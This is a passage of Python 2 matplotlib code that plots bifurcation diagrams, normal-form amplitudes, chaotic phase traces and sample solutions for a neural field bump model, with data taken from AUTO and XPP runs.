ax2.annotate("HB",color='orange',
xy=(1.50704,0.), xycoords='data',
xytext=(1., -.2), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='orange'),
)
ax2.annotate("LP 2",color='purple',
xy=(2.84, -.779), xycoords='data',
xytext=(3., -.5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
#ax2.annotate(r"\colorbox{blue!20}{{\color{yellow}LP Large}}",
"""
ax2.annotate("LP 1",
xy=(2.20126, 0.847046), xycoords='data',
xytext=(2.7, .40746), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w"),
)
"""
#ax.set_xlabel(r'$\bm{g}$',size=15)
# mark bistability
ax2.plot([2.25346,2.25346],[-2,2],ls=':',color='black')
ax2.plot([2.38425,2.38425],[-2,2],ls=':',color='black')
ax3 = plt.subplot2grid((2,2),(0,1),rowspan=2)
ax3.set_title(r'\textbf{(c)}',x=0,y=1.02)
namelist = ['HB','LP 2']#['BP','HB','LP 2','LP 1']
colorlist = ['orange','purple']#['teal','orange','purple','black']
filelist = ['bif_full_a2_gq_hb.dat','bif_full_a2_gq_lp2.dat']#,'bif_full_gq_lp2.dat']#["bif_gq_bp.dat","bif_gq_hb.dat","bif_gq_lp_travel.dat","bif_gq_lp_large.dat"]
ls = ['--','-.','-', '--', '-.', ':']
ax3 = draw_branches_twop(ax3,filelist,namelist,colorlist,ls)
ax3.text(1.5,2.6,'1. Stationary Bump',rotation=0,size=15)
ax3.text(3.3,2.5,'2. Wobbling Bump',rotation=37,size=15)
#ax2.text(3.5,1.55,'3. Bistability',rotation=27,size=15)
ax3.text(3.2,.3,'4. Traveling Bump',rotation=0,size=15)
ax3.plot([0,5],[.5,.5],color='gray')
#ax2.text(1.5,.075,'reminder: added line from g=2 to g=1 for LP2')
#ax3.legend(loc='upper left',fontsize=8)
ax3.set_xlabel(r'$\bm{g}$',size=15)
ax3.set_ylabel(r'$\bm{q}$',size=15)
ax3.set_xlim(1,5)
return fig
def root(ushift,g):
"""
find slow limit cycle/wobbling bump
"""
time = 882.4*5
sim = oned_simple.SimDat(q=0.5,g=g,T=time,ushift=ushift,zshift=1e-5)
max_loc = np.r_[True, sim.ph_angle[1:] > sim.ph_angle[:-1]] & np.r_[sim.ph_angle[:-1] > sim.ph_angle[1:], True]
local_maxima = sim.ph_angle[max_loc][1:-1]
diffraw = local_maxima[-2] - local_maxima[-3]
print 'diffraw=',diffraw,'ushift=',ushift
return diffraw
def oned_normal_form():
"""
1d normal form calculation. probably incorrect. see bard's normal form calculation below.
"""
fig = plt.figure(figsize=(8,4))
#ax = fig.add_subplot(111)
ax = plt.subplot2grid((1,2),(0,0))
ax2 = plt.subplot2grid((1,2),(0,1))
#ax3 = plt.subplot2grid((2,1),(1,1))#fig.add_subplot(132)
ax.set_title(r"\textbf{(a)}",x=0,y=1.05)
gvals_long = np.linspace(1.5,2.,201) # use in theory
# theory
ss = oned_simple.SteadyState()
mu = ss.kap
Aprime = ss.Hamp
# get a better approximation later.
eps = .01
period = eps*882.4 # period in tau (period in t times eps)
#period = eps*441.2 # period in tau
om = 2*pi/period
# for a cosine kernel, H(x) = A'sin(x)
h1 = Aprime*1.
h3 = Aprime*(-1./6)
be = 1.
q = .5
gstar = (mu*be - q*(-Aprime))/Aprime#+.00625
print Aprime,om,gstar
#B = 2*sqrt( -(be**2 + 4.*om**2)*h1/(gstar*h3) )/(6.*om)
f1 = sqrt(be**2. + om**2.)
#f2 = sqrt(be**2. + 4*om**2.)
#B = 2*om*sqrt(h1*f2)/sqrt(h3*(12.*q*f1*f2-144.*gstar*om**4))
B = 2.*(2.*sqrt(h1*om))/(f1*sqrt(h3*((12.*q)/om - (144.*gstar*om**3.)/(be**4. + 5.*be**2.*om**2. + 4.*om**4.))))
amp = B*sqrt(gvals_long-gstar)
#amp = sqrt(g-gstar)
# numerics
#gvals_short = [1.5,1.505,1.51,1.515]
#gvals_short = np.linspace(1.5,1.75,41)
gvals_short = np.arange(1.50625,2.,.00625)
amp_num = np.zeros(len(gvals_short))
i = 0
ushift = 0.
zshift = 1e-5
savedir = 'hopf_data/'
if (not os.path.exists(savedir)):
os.makedirs(savedir)
for g in gvals_short:
time = 1500.#882.4*2
print "g="+str(g)
tol = 5e-4
filename = 'osc_g='+str(g)+'.dat'
if os.path.isfile(savedir+filename):
local_max = float(open(savedir+filename,'r').readline())
#print local_max
else:
#print
#ss_time = sim.t[int(time/sim.dt/1.5):]
sim = oned_simple.SimDat(q=0.5,g=g,T=time,ushift=0,zshift=.1,sim_factor=70)
max_loc = np.r_[True, sim.ph_angle[1:] > sim.ph_angle[:-1]] & np.r_[sim.ph_angle[:-1] > sim.ph_angle[1:], True]
local_maxima = sim.ph_angle[max_loc][1:-1]
local_max = local_maxima[-1]
file_ = open(savedir+filename,'w')
file_.write(str(local_max))
file_.close()
amp_num[i] = local_max
#mp.figure()
#mp.plot(sim.t,sim.ph_angle)
#mp.show()
#ushift = sp.optimize.brentq(root,0,pi,args=(g,),rtol=1e-4)
i += 1
data = np.zeros((len(gvals_short),2))
data[:,0] = gvals_short
data[:,1] = amp_num
"""
ax.annotate("("+str(data[20,0])+","+str(data[20,1])+")",
xy=(data[20,0], data[20,1]), xycoords='data',
xytext=(data[20,0]-.05, data[20,1]+.05), textcoords='data',
size=12,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3")
)
"""
#np.savetxt("hopf_amplitude.dat")
ax.plot(gvals_long,amp,color="#3399ff",ls='dashed',label="Theoretical",lw=3)
ax.plot(gvals_short,amp_num,color="black",label="Numerical",lw=3)
ax.set_xlim(data[:,0][0]-.01,data[:,0][-1]+.01)
ax.set_ylabel(r"\textbf{Oscillation Amplitude (A)}")
ax.set_xlabel(r"\textbf{Adaptation (g)}")
ax.legend(loc=4)
"""
PLOT SOLUTION ARRAY
"""
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
dat = oned_simple.SimDat(g=1.55,q=.5,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
shift = -700
sign = 1
ax2.set_xlabel(r'$x$')
ax2.set_title(r"\textbf{(b)}",x=0)
#ax2.set_ylabel(r'$t$')
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax2.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax2.xaxis.tick_bottom()
ax2.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
for slc in unlink_wrap(dat.ph_angle[idx]):
ax2.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax2.plot(modsolph[slc],timearr[slc],ls='--',color='#3399ff',lw=3)
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax2.set_aspect('auto')
ax2.set_xlim(-pi,pi)
ax2.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax2.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax2.set_xticklabels(x_label)
return fig
def oned_normal_form_bard():
"""
oned normal form using bard's data
"""
filename = 'diagram.dat'
filename2 = 'diagram.25.dat'
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = [2]
b_idx = bif_qg1[:,-2] == branchlist[0]
typelist = [3]#np.unique(bif_qg1[b_idx,-3])
#print typelist
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
label = None
# get all branches
bif_qg2 = np.loadtxt(filename2)
branchlist2 = [2]
b_idx2 = bif_qg2[:,-2] == branchlist2[0]
typelist2 = [3]#np.unique(bif_qg2[b_idx2,-3])
#print typelist
for t in typelist2:
t_idx2 = bif_qg2[:,-3] == t
dat2 = bif_qg2[b_idx2*t_idx2,:]
label = None
fig = plt.figure(figsize=(10,4))
ax = fig.add_subplot(121)
ax.plot(dat[:,0],dat[:,1],label='AUTO',lw=3,color='black')
dom1 = np.linspace(2,2.5,100)
ax.plot(dom1,2*np.sqrt((10./13.)*(dom1-2)),label='Normal Form',lw=3,ls='--',color='#3399ff')
ax.set_title(r'\textbf{(a)}',x=0,y=1.03)
ax.set_ylabel(r"\textbf{Oscillation Amplitude}")
ax.set_xlabel(r"\textbf{Adaptation ($g$)}")
#ax.set_xlabel(r'Adaptation ($g$)')
#ax.set_ylabel(r'Oscillation Amplitude')
ax.set_xlim(2,2.5)
ax.set_ylim(0,1.4)
#ax.legend()
ax2 = fig.add_subplot(122)
ax2.plot(dat2[:,0],dat2[:,1],label='AUTO',lw=3,color='black')
dom2 = np.linspace(1.25,1.5,100)
ax2.plot(dom2,2*np.sqrt(.5*(dom2-1.25)/.2175),label='Normal Form',lw=3,ls='--',color='#3399ff')
ax2.set_title(r'\textbf{(b)}',x=0,y=1.03)
ax2.set_ylabel(r"\textbf{Oscillation Amplitude}")
ax2.set_xlabel(r"\textbf{Adaptation ($g$)}")
#ax2.set_xlabel(r'Adaptation ($g$)')
#ax2.set_ylabel(r'Oscillation Amplitude')
ax2.set_xlim(1.25,1.5)
ax2.set_ylim(0,1.6)
ax2.legend(loc='lower right')
return fig
def g_nu_fig():
"""
plot g(nu)
"""
N = 100
nu = np.linspace(.00001,1,N)
s = np.linspace(0,10.,100)
ds = (s[-1]-s[0])/len(s)
g1 = np.zeros(N)
g2 = np.zeros(N)
for i in range(N):
tot = 0
tot2 = 0
# find integral of exp(-s)*H(nu s)
for j in range(len(s)):
tot += np.exp(-s[j])*(sin(nu[i]*s[j])-(.25)*sin(2.*nu[i]*s[j]))*ds#np.sin(nu[i]*s[j])*ds
tot2 += np.exp(-s[j])*(sin(nu[i]*s[j]))*ds#np.sin(nu[i]*s[j])*ds
g1[i] = nu[i]/tot
g2[i] = nu[i]/tot2
fig = plt.figure(figsize=(10,4))
ax2 = fig.add_subplot(121)
ax2.plot(nu,g2,lw=3,ls='-',color='black')
ax2.set_title(r'\textbf{(a)}',fontsize=20,x=0,y=1.03)
ax2.set_ylabel(r'$g(\nu)$',fontsize=20)
ax2.set_xlabel(r'$\nu$',fontsize=20)
ax2.tick_params(labelsize=15)
ax1 = fig.add_subplot(122)
split_idx = np.argmin(g1)
ax1.plot(nu[:split_idx],g1[:split_idx],lw=3,ls='--',color='black')
ax1.plot(nu[split_idx:],g1[split_idx:],lw=3,ls='-',color='black')
ax1.set_title(r'\textbf{(b)}',fontsize=20,x=0,y=1.03)
ax1.set_xlabel(r'$\nu$',fontsize=20)
ax1.tick_params(labelsize=15)
return fig
#plt.show()
def oned_chaos_fig():
"""
"""
fig = plt.figure(figsize=(10,3))
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax1 = fig.add_subplot(121)
c1 = np.loadtxt("chaos_simple1.dat")
c2 = np.loadtxt("chaos_simple2.dat")
NT = len(c1)
t = np.linspace(0,50000,NT)
dt = t[-1]/NT
start_t = 14000
end_t = 20000
sidx = int(start_t/dt)
eidx = int(end_t/dt)
for slc in unlink_wrap(c1[sidx:eidx]):
ax1.plot(t[sidx:eidx][slc],c1[sidx:eidx][slc],color='black',lw=2)
for slc in unlink_wrap(c2[sidx:eidx]):
ax1.plot(t[sidx:eidx][slc],c2[sidx:eidx][slc],color='#3399ff',lw=2,ls='--',dashes=(5,1))
ax1.set_ylabel(r'$\bm{\theta}$')
ax1.set_xlabel(r'$\bm{t}$')
ax1.set_xlim(start_t,end_t)
ax1.set_ylim(-pi,pi)
ax1.set_yticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax1.set_yticklabels(x_label)
ax2 = fig.add_subplot(122)
ct1 = np.loadtxt("chaos_simple_theory1.dat")
ct2 = np.loadtxt("chaos_simple_theory2.dat")
NTt = len(ct1)
t2 = np.linspace(0,50000,NTt)
dt2 = t2[-1]/NTt
start_t2 = 34000
end_t2 = 40000
sidx2 = int(start_t2/dt2)
eidx2 = int(end_t2/dt2)
for slc in unlink_wrap(ct1[sidx2:eidx2]):
ax2.plot(t2[sidx2:eidx2][slc],ct1[sidx2:eidx2][slc],color='black',lw=2)
for slc in unlink_wrap(ct2[sidx2:eidx2]):
ax2.plot(t2[sidx2:eidx2][slc],ct2[sidx2:eidx2][slc],color='#3399ff',lw=2,ls='--',dashes=(5,1))
#ax2.set_ylabel(r'$\bm{\theta}$')
ax2.set_xlabel(r'$\bm{t}$')
ax2.set_xlim(start_t2,end_t2)
ax2.set_ylim(-pi,pi)
ax2.set_yticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax2.set_yticklabels(x_label)
return fig
def twod_auto_3terms_fig_old():
"""
twod bifurcation diagram for truncated h
"""
#raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
if True:
raw_data = np.loadtxt('twodphs_sxs_wave_diagram_q=.125.dat')
raw_data2 = np.loadtxt('twodphs_sxs_osc2_diagram_q=.125.dat')
raw_data3 = np.loadtxt('twodphs_sxs_hopf_diagram_q=.125.dat')
raw_data4 = np.loadtxt('twodphs_sxs_wave2_diagram_q=.125.dat')
if False:
raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
raw_data2 = np.loadtxt('twodphs_cys_osc2_diagram_q=.125.dat')
raw_data3 = np.loadtxt('twodphs_cys_hopf_diagram_q=.125.dat')
raw_data4 = np.loadtxt('twodphs_cys_wave2_diagram_q=.125.dat')
if False:
raw_data = np.loadtxt('twodphs_x_wave_diagram_q=.125.dat')
raw_data2 = np.loadtxt('twodphs_cys_osc2_diagram_q=.125.dat')
raw_data3 = np.loadtxt('twodphs_x_hopf_diagram_q=.125.dat')
raw_data4 = np.loadtxt('twodphs_x_wave2_diagram_q=.125.dat')
data = diagram.read_diagram(raw_data)
data2 = diagram.read_diagram(raw_data2)
data3 = diagram.read_diagram(raw_data3)
data4 = diagram.read_diagram(raw_data4)
print np.shape(data)
fig = plt.figure()
ax = fig.add_subplot(111)
# plot unstable fixed points
ax.scatter(data[:,0],data[:,2],s=10,color='black')
ax.scatter(data[:,0],data[:,6],s=10,color='black')
ax.scatter(data3[:,0],data3[:,2],s=10,color='black')
ax.scatter(data3[:,0],data3[:,6],s=10,color='black')
# plot unstable periodic solutions
ax.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data[:,0],data[:,8],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data2[:,0],data2[:,4],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data2[:,0],data2[:,8],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data3[:,0],data3[:,4],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data3[:,0],data3[:,8],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data4[:,0],data4[:,4],s=10,facecolor='none',edgecolor='#0099ff')
ax.scatter(data4[:,0],data4[:,8],s=10,facecolor='none',edgecolor='#0099ff')
# plot stable fixed points
ax.scatter(data[:,0],data[:,1],s=10,color='red')
ax.scatter(data[:,0],data[:,5],s=10,color='red')
ax.scatter(data3[:,0],data3[:,1],s=10,color='red')
ax.scatter(data3[:,0],data3[:,5],s=10,color='red')
# plot stable periodic solutions
ax.scatter(data[:,0],data[:,3],s=20,color='green')
ax.scatter(data[:,0],data[:,7],s=20,color='green')
ax.scatter(data2[:,0],data2[:,3],s=20,color='green')
ax.scatter(data2[:,0],data2[:,7],s=20,color='green')
ax.scatter(data3[:,0],data3[:,3],s=20,color='green')
ax.scatter(data3[:,0],data3[:,7],s=20,color='green')
ax.scatter(data4[:,0],data4[:,3],s=20,color='#00cc00')
ax.scatter(data4[:,0],data4[:,7],s=20,color='#00cc00')
ax.set_xlim(.5,3)
ax.set_ylim(-.01,1.)
return fig
def get_switch_points(data):
"""
given allinfo bifurcation diagram data, find all locations where stability changes.
"""
pass
def twod_phase_auto_3terms_fig1():
"""
twod bifurcation diagram for truncated h
q = 0.01
"""
#raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
# all info data files are organized as follows:
# Type, BR, 0, par1, par1/2, period, sv1 (high), ..., sv10 (high), sv1 (low),...,sv10(high), real/im eigenvalue pairs...
# so I could use these values as initial conditions to plot.
bif_data = np.loadtxt('twodphs_3_sxs_TR_q=.01.dat')
init_data = np.loadtxt('twodphs_3_init_TR_q=.01.dat')
# manually get index of sxs value
idx = 5
fig = plt.figure(figsize=(6,7))
### BIFURCATION DIAGRAM
gs = gridspec.GridSpec(4, 4)
gs.update(hspace=.75)
gs.update(wspace=.3)
ax11 = plt.subplot(gs[:3, :3])
#ax11 = plt.subplot2grid((4,4),(0,0),colspan=3,rowspan=2)
#ax21 = plt.subplot2grid((4,4),(2,0),colspan=3,rowspan=1,sharex=ax11)
#ax11 = plt.subplot2grid((4,4),(0,0),colspan=3,rowspan=3)
# pre-allocate for conversion to simple bifurcation data
bif_data_simple = np.zeros((len(bif_data[:,0]),6))
# remember write pts from auto gives: par, min, max, type, BR.
# parameter value
bif_data_simple[:,0] = bif_data[:,3]
# max value
# first get relative position of desired state variable
bif_data_simple[:,1] = bif_data[:,5+idx]
# min value
bif_data_simple[:,2] = bif_data[:,5+idx+10]
# type
bif_data_simple[:,3] = bif_data[:,0]
# branch
bif_data_simple[:,4] = abs(bif_data[:,1])
data = diagram.read_diagram(bif_data_simple)
for i in range(1,len(data[0,:])):
x = data[:,0]
y = data[:,i]
data[:,0],data[:,i]=clean(x,y,tol=.1)
if (i == 4):
print i
x = data[:,0]
y = data[:,i]
data[:,0],data[:,i]=remove_redundant_x(x,y,tol=1e-7)
# plot unstable fixed points
#ax11.scatter(data[:,0],data[:,2],s=10,color='black')
ax11.plot(data[:,0],data[:,2],color='black')
# plot unstable periodic solutions
#ax11.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
ax11.plot(data[:,0],data[:,4],color='blue')
#ax.scatter(data[:,0],data[:,8],s=10,facecolor='none',edgecolor='blue')
# plot stable fixed points
#ax11.scatter(data[:,0],data[:,1],s=10,color='red')
#ax11.scatter(data[:,0],data[:,5],s=10,color='red')
ax11.plot(data[:,0],data[:,1],color='red')
ax11.plot(data[:,0],data[:,5],color='red')
# plot stable periodic solutions
#ax11.scatter(data[:,0],data[:,3],s=5,color='green')
#ax11.scatter(data[:,0],data[:,7],s=5,color='green')
ax11.plot(data[:,0],data[:,3],color='green',lw=3,ls='--')
ax11.plot(data[:,0],data[:,7],color='green',lw=3,ls='--')
ax11.set_xlabel('$g$')
ax11.xaxis.set_label_coords(0.5,-.03)
ax11.set_ylabel('$sx$')
ax11.set_xlim(.5,1)
ax11.set_ylim(.75,1)
# bifurcation diagram inset
axins11 = inset_axes(ax11,
width="60%", # width = 30% of parent_bbox
height="40%", # height : 1 inch
loc=3)
axins11.plot(data[:,0],data[:,4],color='blue')
axins11.plot(data[:,0],data[:,3],color='green',lw=3,ls='--')
axins11.plot(data[:,0],data[:,7],color='green',lw=3,ls='--')
ax11.annotate("TR",
xy=(.9095,.79), xycoords='data',
xytext=(.9,.82), textcoords='data',
size=15,
color='red',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axins11.annotate("PD",
xy=(.5984,.9745), xycoords='data',
xytext=(.595,.973), textcoords='data',
size=15,
color='black',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axins11.annotate("BP",
xy=(.59,.9795), xycoords='data',
xytext=(.588,.977), textcoords='data',
size=15,
color='blue',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
#axins11.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#axins11.scatter(data[:,0],data[:,3],s=5,color='green')
#axins11.scatter(data[:,0],data[:,7],s=5,color='green')
#axins11.scatter(g,sxsval,color='purple')
mark_inset(ax11, axins11, loc1=2, loc2=4, fc="none", ec="0.5")
plt.xticks(visible=False)
plt.yticks(visible=False)
axins11.set_xlim(.586105,.600328)
axins11.set_ylim(.972532,.984061)
# LOOP OVER SAMPLE SOLUTIONS
rlist = [957,998,1206,655,634,587,8]
loclist = [(3,0),(3,1),(3,2),(0,3),(1,3),(2,3),(3,3)]
labellist = [r'\textbf{A}',r'\textbf{B}',r'\textbf{C}',r'\textbf{D}',r'\textbf{E}',r'\textbf{F}',r'\textbf{G}']
pos = []
axlist = []
for i in range(len(rlist)):
rown = rlist[i]
g = bif_data[rown,3]
per = bif_data[rown,5]
init = init_data[rown,5:]
dt = .01
#print g,per,bif_data[rown,6:6+10]
print init_data[rown,2],init_data[rown,4],init
npa, vn = xpprun('twodphs3.ode',
xppname='xppaut',
inits={'x':init[0],'y':init[1],
'cxs':init[2],'cys':init[3],
'sxs':init[4],'sys':init[5],
'sxsys':init[6],'sxcys':init[7],
'cxsys':init[8],'cxcys':init[9]},
parameters={'total':per,
'g':g,
'q':0.01,
'dt':dt},
clean_after=True)
t = npa[:,0]
sv = npa[:,1:]
idx = vn.index('sxs')
sxsval = bif_data[rown,6+idx]
#axlist.append(plt.subplot2grid((4,4),loclist[i]))
axlist.append(plt.subplot(gs[loclist[i][0],loclist[i][1]]))
"""
ax41 = plt.subplot2grid((4,4),(3,0))
ax42 = plt.subplot2grid((4,4),(3,1))
ax43 = plt.subplot2grid((4,4),(3,2))
ax14 = plt.subplot2grid((4,4),(0,3))
ax24 = plt.subplot2grid((4,4),(1,3))
ax34 = plt.subplot2grid((4,4),(2,3))
ax44 = plt.subplot2grid((4,4),(3,3))
"""
### SAMPLE SOLUTIONS
xval = np.mod(sv[:,vn.index('x')]+pi,2*pi)-pi
yval = np.mod(sv[:,vn.index('y')]+pi,2*pi)-pi
pos1 = np.where(np.abs(np.diff(xval)) >= 1)[0]
pos2 = np.where(np.abs(np.diff(yval)) >= 1)[0]
xval[pos1] = np.nan
yval[pos2] = np.nan
xval[pos2] = np.nan
yval[pos2] = np.nan
dashes = []
print bif_data[rown,0]
if abs(bif_data[rown,0]) == 4.:
dashes = (5,2)
axlist[i].plot(xval,yval,color='black',lw=2,dashes=dashes)
# label 2 points with arrows
back_idx = 5
idxlist = [int(0.*(per/dt)),int(1.*(per/dt)/2.)]# depends on period
for j in idxlist:
axlist[i].annotate("",
xy=(xval[j], yval[j]), xycoords='data',
xytext=(xval[j-back_idx], yval[j-back_idx]), textcoords='data',
size=15,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axlist[i].set_xlim(-pi,pi)
axlist[i].set_ylim(-pi,pi)
axlist[i].tick_params(axis=u'both',which=u'both',length=0)
axlist[i].set_xticks(np.arange(-1,1+1,1)*pi)
axlist[i].set_yticks(np.arange(-1,1+1,1)*pi)
x_label = [r"$-\pi$", r"$0$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
axlist[i].set_xticklabels(x_label)
axlist[i].set_yticklabels(x_label)
if i >= 3:
axlist[i].yaxis.tick_right()
if i < 3:
axlist[i].set_yticklabels([])
if i >= 3 and i < len(labellist)-1:
axlist[i].set_xticklabels([])
# annotations corresponding to solution plots
axins11.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
verticalalignment='top',
horizontalalignment='right',
backgroundcolor='yellow',
zorder=-1
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
ax11.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
backgroundcolor='yellow',
zorder=-1
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
axlist[i].set_title(labellist[i])
"""
ax11.annotate("",
xy=(th1[i], th2[i]), xycoords='data',
xytext=(th1[i-back_idx], th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
"""
#ax11.
ax11.scatter(g,sxsval,s=10,color='black',marker='^')
axins11.scatter(g,sxsval,s=10,color='black',marker='^')
#ax2.plot(t,np.mod(sv[:,vn.index('x')],2*pi))
#ax2.plot(t,np.mod(sv[:,vn.index('sxs')],2*pi))
#ax2.plot(t,np.mod(npa[:,vn.index('sxs')],2*pi))
#ax2.plot(t,np.mod(npa[:,vn.index('y')],2*pi))
return fig
def twod_phase_auto_3terms_fig2():
"""
twod bifurcation diagram for truncated h
q = 0.1
"""
#raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
# all info data files are organized as follows:
# Type, BR, 0, par1, par1/2, period, sv1 (high), ..., sv10 (high), sv1 (low),...,sv10(high), real/im eigenvalue pairs...
# so I could use these values as initial conditions to plot.
bif_data = np.loadtxt('twodphs_3_HB_PD_q=.1_appended.dat')
init_data = np.loadtxt('twodphs_3_init_HB_PD_q=.1_appended.dat')
#bif_data = np.loadtxt('twodphs_3_HB_PD_q=.1_appended.dat')
#init_data = np.loadtxt('twodphs_3_init_HB_PD_q=.1_appended.dat')
# manually get index of sxs value
idx = 5
fig = plt.figure(figsize=(7,9))
### BIFURCATION DIAGRAM
gs = gridspec.GridSpec(5, 4)
gs.update(hspace=.4)
gs.update(wspace=.3)
ax11 = plt.subplot(gs[:2, :3])
#ax11 = plt.subplot2grid((4,4),(0,0),colspan=3,rowspan=2)
#ax21 = plt.subplot2grid((4,4),(2,0),colspan=3,rowspan=1,sharex=ax11)
ax21 = plt.subplot(gs[2:4,:3],sharex=ax11)
# pre-allocate for conversion to simple bifurcation data
bif_data_simple = np.zeros((len(bif_data[:,0]),6))
# remember write pts from auto gives: par, min, max, type, BR.
# parameter value
bif_data_simple[:,0] = bif_data[:,3]
# max value
# first get relative position of desired state variable
bif_data_simple[:,1] = bif_data[:,5+idx]
# min value
bif_data_simple[:,2] = bif_data[:,5+idx+10]
# type
bif_data_simple[:,3] = bif_data[:,0]
# branch
bif_data_simple[:,4] = abs(bif_data[:,1])
data = diagram.read_diagram(bif_data_simple)
for i in range(1,len(data[0,:])):
x = data[:,0]
y = data[:,i]
data[:,0],data[:,i]=clean(x,y,tol=.1)
if (i == 4):
print i
x = data[:,0]
y = data[:,i]
data[:,0],data[:,i]=remove_redundant_x(x,y,tol=1e-7)
# plot unstable periodic solutions
#ax11.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data[:,0],data[:,8],s=10,facecolor='none',edgecolor='blue')
ax11.plot(data[:,0],data[:,4],color='blue',zorder=0)
# plot stable periodic solutions
ax11.plot(data[:,0],data[:,3],color='green',lw=3,zorder=0)
#ax11.scatter(data[:,0],data[:,3],s=5,color='green')
#ax11.scatter(data[:,0],data[:,7],s=5,color='green')
# plot stable periodic solutions
ax21.plot(data[:,0],data[:,3],color='green',lw=3,zorder=0)
#ax21.scatter(data[:,0],data[:,3],s=5,color='green')
#ax21.scatter(data[:,0],data[:,7],s=5,color='green')
# plot unstable fixed points
#ax21.scatter(data[:,0],data[:,2],s=10,color='black')
ax21.plot(data[:,0],data[:,2],color='black',zorder=0)
# plot stable fixed points
ax21.plot(data[:,0],data[:,1],color='red',lw=3,zorder=0)
#ax21.scatter(data[:,0],data[:,1],s=10,color='red')
#ax21.scatter(data[:,0],data[:,5],s=10,color='red')
#ax21.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
ax21.plot(data[:,0],data[:,4],color='blue',lw=2,zorder=0)
"""
# bifurcation diagram inset
axins11 = inset_axes(ax11,
width="60%", # width = 30% of parent_bbox
height="40%", # height : 1 inch
loc=3)
#axins11.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#axins11.scatter(data[:,0],data[:,3],s=5,color='green')
#axins11.scatter(data[:,0],data[:,7],s=5,color='green')
#axins11.scatter(g,sxsval,color='purple')
mark_inset(ax11, axins11, loc1=2, loc2=4, fc="none", ec="0.5")
plt.xticks(visible=False)
plt.yticks(visible=False)
"""
# bifurcation diagram inset
ax11.add_patch(
patches.Rectangle(
(.865, .7),
(.88-.865),
(1.05-.7),
fill=False,
alpha=.5
)
)
ax11.text(.82,.66,'**',size=20)
ax21.text(.82,.205,'**',size=20)
#ax11.plot([.865,.84],[.7,.4],color='gray')
#ax11.plot([.88,2.1],[1.05,.4],color='gray')
axins21 = inset_axes(ax21,
width="78%",
height="78%",
loc=1)
#axins21.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#axins21.scatter(data[:,0],data[:,3],s=5,color='green')
#axins21.scatter(data[:,0],data[:,7],s=5,color='green')
#axins11.scatter(g,sxsval,color='purple')
axins21.plot(data[:,0],data[:,4],color='blue',zorder=0)
